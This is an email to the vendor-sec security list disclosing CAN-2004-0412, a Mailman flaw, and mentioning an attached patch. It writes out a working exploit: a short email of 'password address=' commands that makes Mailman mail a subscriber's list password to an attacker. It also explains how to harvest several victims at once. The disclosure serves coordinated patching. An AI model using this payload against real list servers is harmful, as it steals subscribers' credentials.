From: Mark J Cox <mjc@redhat.com>
To: vendor-sec@lst.de
Cc: barry@python.org, jdennis@redhat.com
Subject: [vendor-sec] CAN-2004-0412 Mailman password stealing
Parts/Attachments:
   1 Shown     36 lines  Text
   2   OK    ~1.4 KB     Text, ""
----------------------------------------

We noticed a security flaw mentioned in Mailman as part of the 2.1.5 
release.  See:
http://mail.python.org/pipermail/mailman-announce/2004-May/000072.html

I tracked down the issue this morning and worked out an easy exploit:

Send the following email (From: address doesn't matter)

--
To: fedora-devel-list-request@redhat.com

password address=markcox@gmail.com
password address=mjc@redhat.com
--

This will cause mailman to send the fedora-devel-list mailman password
belonging to markcox@gmail.com (victim) to mjc@redhat.com (attacker).  
mjc@redhat.com doesn't have to be a subscriber to the list. Therefore you
can effectively steal the passwords for any subscribers if you know who is
subscribed.  You can add in more "password address=victim"  lines before
the final line to retrieve multiple passwords (leaving the last line
intact pointing to you, to make sure that final email gets sent to you)

Patch for just this issue extracted from the big 2.1.4-2.1.5 diff is
attached.  Barry has confirmed this is correct.

This issue doesn't seem to affect 2.0.13 (the function is
ProcessPasswordCmd in MailCommandHandler.py doesn't let you switch users).

Anyway, this is public, but no one seems to have noticed so I allocated
CAN-2004-0412 to it anyway.  If Debian or FreeBSD noticed and allocated a
name please reply on list asap.